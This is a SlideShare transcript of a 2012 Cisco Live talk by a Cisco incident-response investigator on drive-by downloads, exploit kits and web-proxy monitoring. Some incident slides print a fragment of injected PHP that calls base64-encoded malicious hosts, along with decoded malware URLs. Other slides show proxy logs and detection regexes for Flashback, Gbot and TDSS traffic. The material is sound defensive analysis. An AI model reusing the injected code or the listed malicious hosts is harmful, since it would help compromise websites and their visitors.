• Save
The State of Web Security: Attack and Response (2012 San Diego)
 

The State of Web Security: Attack and Response (2012 San Diego)

on

  • 1,159 views

Routine web browsing throws open the door for alarming numbers of drive-by downloads and targeted attacks. Botnets, covert tunnels,exploit kits, and innumerable malicious objects ease through ...

Routine web browsing throws open the door for alarming numbers of drive-by downloads and targeted attacks. Botnets, covert tunnels,exploit kits, and innumerable malicious objects ease through firewalls at the behest of a surprisingly vulnerable web browser ecosystem. We'll describe the state of web security, and how security and incident response teams can leverage a security proxy in their monitoring defense-in-depth strategy. Where are the malicious payloads hosted? How are legitimate sites infected by criminals? How do we detect and prevent web-based attacks? Use these answers to optimize your web security efforts.

Cisco Live 365: https://www.ciscolive365.com/connect/sessionDetail.ww?SESSION_ID=4360

Statistics

Views

Total Views
1,159
Views on SlideShare
1,154
Embed Views
5

Actions

Likes
0
Downloads
0
Comments
0

2 Embeds 5

https://www.linkedin.com 4
http://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

The State of Web Security: Attack and Response (2012 San Diego) The State of Web Security: Attack and Response (2012 San Diego) Presentation Transcript

  • The State of Web Security: Attack and Response BRKSEC-2010BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 2
  • • Jeff Bollinger, Investigator – Cisco: Computer Security Incident Response Team (CSIRT)• CSIRT = Security Monitoring and Incident Response• Architecture, Engineering, Research, and Investigations• Enterprise global threat and incident responseBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
  • Agenda• Web Threat Landscape and Trends• Real Incidents• Security Monitoring and Incident ResponseBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
  • The web browser is not the only target, the whole browsingecosystem is at risk.
  • Web Attacks are Hot! 2009 “70 Percent of the top 100 [Internet] sites either hosted malicious content or contained amasked redirect to lure unsuspecting victims from legitimate sites to malicious sites... Waves of targeted email attacks… are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, Java, QuickTime, Adobe Flash and Microsoft Office. Those same client-side vulnerabilities are exploited by attackers who have infected visitors via insecure websites…”Source: Websense “State of Internet Security, Q3-Q4”, 2008. BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
  • Web Attacks are Hotter! 2010• Websense Security Labs identified a 111.4% increase in the number of malicious websites from 2009 to 2010.• 79.9% of websites with malicious code were legitimate sites that have been compromised.• Searching for breaking trends and current news represented a higher risk (22.4%) than searching for objectionable content (21.8%).• The United States was the top country hosting phishing sites in 2010. Source: Websense 2010 Threat ReportBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
  • Growing Software Threatscape 2011• “…the number of vulnerabilities affecting typical end-points has more than tripled with the majority of these (78%) found in non-Microsoft (third-party) programs, which are considerably more difficult to patch as several different update mechanisms are required.”• “72% of the vulnerabilities had a patch available on the day of vulnerability disclosure.”• “50% of users were found to have more than 66 programs installed from more than 22 different vendors.” Source: Secunia Yearly Report 2011.BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
  • Web Attacks are Still Hot! 2012• There was a 27% increase in the number of malicious domains from 2011 to 2012 and a 47% increase from 2010 to 2011.• An average of 20,141 unique Web malware hosts were encountered per month in 2011, compared to a monthly average of 14,217 in 2010.• During 4Q11, 33% of Web malware encountered was zero-day malware not detectable by traditional signature-based methodologies at the time of encounter. Source: Cisco Global Threat Report Q42011.BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
  • Check YourselfBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
  • Your Browser is an OSSource: “The Inconvenient Truth About the State of Browser Security”, 2011. Wolfgang Kandek, CTO Qualys, Inc. BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
  • “Looking long term, upwards of 60% of Java installations are never up to the current patch level. Since so many computers aren’t updated, even older exploits can be used to compromise victims. …We found that during the first month after a Java patch is released, adoption is less than 10%. After 2 months, approximately 20% have applied patches and after 3 months, we found that more than 30% are patched. We determined that the highest patch rate last year was 38% with Java Version 6 Update 26 3 months after its release.” - Marcus Carey, Rapid7Source: Krebs on Security “New Java Attack Rolled into Exploit Packs”. March, 2012. BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
  • Web Exploit ToolkitsBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
  • Real Incidents
  • “Fileless” Bot DLL Injection from the Web  “After seizing all necessary privileges on the victim computer, the exploit does not install malware on the hard drive using Java.  Instead, it uses its payload to inject an encrypted dll from the web directly into the memory of the javaw.exe process. “Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’. March, 2012. BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
  • “Fileless” Bot DLL Injection from the Web “In the course of the investigation it was determined that the cybercriminals had used the account of an Adfox customer to change the code of news headline banners by adding an iframe redirecting users to the malicious site. After modifying code in one of the banners, they were able to attack not only users on one news site, but also visitors to other resources carrying this banner. As a result, there could be tens of thousands of users who were attacked. At the same time, banners of other AdFox clients did not contain the malicious code.”Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’. March, 2012. BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
  • CSIRT Detects OutbreakJAR File Drive-by Attacking CVE-2011-3544  Packet captures provide JAR file for malware analysis  Searching web access logs for Java user-agents fetching binary files; we can trace back to the referring URL  Popular news site in Bangalore was referring its readers via Javascript embedded in an ad to a malicious JAR file.  Zeus bot variant downloadedBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
  • Resilient Exploit Hosting Hundreds of hostnames for the JAR delivery host Zeus bot is loaded Zeus config is fetched Information capturedBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 23
  • Malware Analysis Pays OffRequest URL: http://users9.nofeehost.com/patrickkeed/all.binBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
  • Wordpress Injection and AftermathBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
  • Internal clients requested 650+ unique URLs two weeks. Broad range of domains and URLs requested:BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
  • http://www.vfwpost7383.org/BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
  • …$_SERVER[s_p1]=$mz; $_SERVER[s_b1]=$bot; $_SERVER[s_t1]=1200; $_SERVER[s_d1]=base64_decode(aHR0cDovL2VuczEy Mnp6emRkYXp6LmNvbS8=); $d=?d=.urlencode($_SERVER["HTTP_HOST"])."&p=".url encode($_SERVER["PHP_SELF"])."&a=".urlencode($_SE RVER["HTTP_USER_AGENT"]); $_SERVER[s_a1]=base64_decode(aHR0cDovL2Nvb3Bl cmpzdXRmOC5ydS9nX2xvYWQucGhw).$d; $_SERVER[s_a2]=base64_decode(aHR0cDovL25saW5 0aGV3b29kLmNvbS9nX2xvYWQucGhw).$d; $_SERVER[s_script]="nl.php?p=d";…BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 30
  • aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=http://ens122zzzddazz.comaHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw’http://cooperjsutf8.ru/g_load.phpaHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhwhttp://nlinthewood.com/g_load.phpBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 31
  • 1332868923.052 129 10.1.2.3 TCP_DENIED/403 419 GEThttp://smains29treamsp.rr.nu/nl.php?p=d BLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh; IntelMac OS X 10.6; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"Referrer="http://www.vfwpost7383.org/" 1332512746.272 195 10.1.2.14 TCP_DENIED/403 419 GET http://pfo42rest.rr.nu/nl.php?p=d BLOCK_WBRS -8.6 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; PredictYourBabySearchToolbar 1.2)" Referrer="http://www.vfwpost7383.org/"1332868632.124 219 10.1.2.98 TCP_DENIED/403 419 GET http://ste07rda.rr.nu/nl.php?p=dBLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11(KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11"Referrer="http://www.vfwpost7383.org/" BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 32
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 33
  • Macintosh OSX Flashback TrojanBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 34
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 35
  • Drive-By Attacks against CVE-2012-0507Hosted at *.rr.nu sitesBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 36
  • If you can identify a unique URI string you can find HTTP bot communicationFlashback user-agent query (2nd and 3rd variants):(auupdate OR scheck OR owncheck) AND (cs_url="*/scheck/*" OR cs_url="*/auupdate/*" OR cs_url="*/owncheck/*") | regexcs_useragent="(^[MN][Djz][BFJNRVZdhl][8][a][T][M][4][N][n])|(^[MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][AEIMQUYcgk][t][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][CSiy][01][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][L][TU][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][AEIMQUYcgk][t][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz])" BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
  • If you can identify a unique URI string you can find HTTP bot communicationFlashback user-agent query (1st variant):NOT cs_referer="*” AND (cs_url="*/scheck/*" OR cs_url="*/owncheck/*") | regex cs_useragent="id:([A-Za-z0-9]){8}-([A-Za-z0-9]){4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){12}"Gbot query: cs_method="GET" cs_url=*jpg?v* cs_url="*tq=*"TDSS query: (cs_url="*2xrP*") | regex cs_url="/.{17}2xrP"BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 38
  • Web Security Monitoring: Detectionand Response
  • HTTP is the Platform  One day of Cisco global traffic  HTTP is 25% of ALL traffic (SSL + 6%)  12.5TBCSIRT WSA Webcast © 2012 Cisco Systems, Inc. All rights reserved. Cisco Public 40
  • Web Security FilteringBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
  • Web Based Reputation System (WBRS) Bad - Block Neutral – AV Scan Good - Allow-10 10 -9 -8 -7 -6 -5 -4 -3 -2 -1 0 1 2 3 4 5 6 7 8 9 BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
  • Decision FlowBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 43
  • Global Logging ArchitectureBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 44
  • Global Logging View and Client Protection BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 45
  • Client Protection in the Network BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 46
  • Drive-by Download Protection in the NetworkBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 47
  • Application Layer Protection in the Network GET / HTTP/1.11 What the client requests from the web Host: ihaveabadreputation.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 403 Forbidden What the client gets back from the proxy2 Mime-Version: 1.0 http://wwwintranet.cisco.com/blocked-page.shtml Date: Thu, 12 Apr 2012 18:38:03 GMT 3 Content-Type: text/html GET /blocked-page.shtml HTTP/1.1 Connection: keep-alive Host: wwwintranet.cisco.com Content-Length: 267 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 48
  • Final Thoughts: • The browser isn’t generally the target, it’s the whole browsing ecosystem that’s at risk. • Exploit packs are filled with effective exploit plugins and often contain 0-days. Antivirus cleans up the older attacks, but theres a huge window for exploitation. • Anything more than basic security education will not help - curiosity will drive people to the exploits - no impetus to patch and inconvenience factor • Invest in research/thinking, let automation at the network and application (patching/AV) layers secure the organization - enables business flexibility with IT - doesnt rely on routine human action - enables deep investigationBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 49
  • Golden Rules • Regularly update your operating system and applications, especially Java, Adobe, and Office products • Use a modern browser and consider plug-ins that turn off scripts and other common ways to attack your browser • Use different passwords for different areas of your life: one for email, one for financial accounts, one for social media, and so on • Watch your credit card and bank statements and check your own credit regularly • Use regularly updated anti-virus • Use a software or hardware firewall • Beware of short, odd tweets, Facebook updates and emails, even from friends, that provide a link. • Use encryption and keep loads of backups of everything, as often and as much as you can stand Source: Steve Santorelli. Cymru Quarterly. March 2012.BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 50
  • Golden Rules (for incident response) • Develop accurate and updated systems of record to identify address, host, and application owners and teams • Deploy log collection where ever possible to maximize audit trails and to enable investigation • Implement event, event log, or log file collection, indexing, searching and reporting mechanisms to operate on “big data” • Develop and maintain a flexible patching strategy (and policy) including timely notification, proper host contacts, and execution plans. • Record anything and everything possible on the network as long as you can store it and search it • Enable development, research, open debate, and invest in expert intelligenceBRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 51
  • Complete Your OnlineSession Evaluation Give us your feedback and you could win fabulous prizes. Winners announced daily. Receive 20 Passport points for each session evaluation you complete. Complete your session Don’t forget to activate your evaluation online now (open a Cisco Live Virtual account for access to browser through our wireless all session material, communities, and on-demand and live activities throughout network to access our portal) or the year. Activate your account at the visit one of the Internet stations Cisco booth in the World of Solutions or visit throughout the Convention www.ciscolive.com. Center.BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public 52
  • BRKSEC-2010 © 2012 Cisco and/or its affiliates. All rights reserved. Cisco Public